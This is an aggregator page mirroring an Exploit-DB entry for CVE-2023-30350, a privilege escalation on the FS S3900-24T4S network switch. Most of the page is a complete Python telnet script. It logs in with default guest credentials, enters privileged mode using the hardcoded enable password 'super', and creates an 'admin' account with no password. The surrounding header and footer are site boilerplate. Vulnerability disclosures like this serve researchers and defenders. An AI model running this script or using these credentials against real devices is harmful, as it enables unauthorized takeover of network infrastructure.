3
[local] FS-S3900-24T4S - Privilege Escalation
source link: https://www.exploit-db.com/exploits/51414
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
FS-S3900-24T4S - Privilege Escalation
# Exploit Title: FS-S3900-24T4S Privilege Escalation
# Date: 29/04/2023
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino
# Vendor Homepage: https://www.fs.com/
# Software Link: not available
# Version: latest
# Tested on: latest
# CVE : CVE-2023-30350
import sys
import telnetlib
def exploit(args):
print(args)
if len(args) != 1:
print(f"Usage: {sys.argv[0]} <ip>")
sys.exit(1)
else:
ip = args[0]
try:
with telnetlib.Telnet(ip, 23) as tn:
try:
tn.read_until(b"Username: ")
tn.write(b"guest\r\n")
tn.read_until(b"Password: ")
tn.write(b"guest\r\n")
tn.read_until(b">")
tn.write(b"enable\r\n")
tn.read_until(b"Password: ")
tn.write(b"super\r\n")
tn.read_until(b"#")
tn.write(b"configure terminal\r\n")
tn.read_until(b"(config)#")
tn.write(b"username admin nopassword\r\n")
tn.read_until(b"(config)#")
print(
"Exploit success, you can now login with username: admin and password: <empty>")
tn.close()
except KeyboardInterrupt:
print("Exploit failed")
tn.close()
except ConnectionRefusedError:
print("Connection refused")
if __name__ == "__main__":
exploit(sys.argv[1:])
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK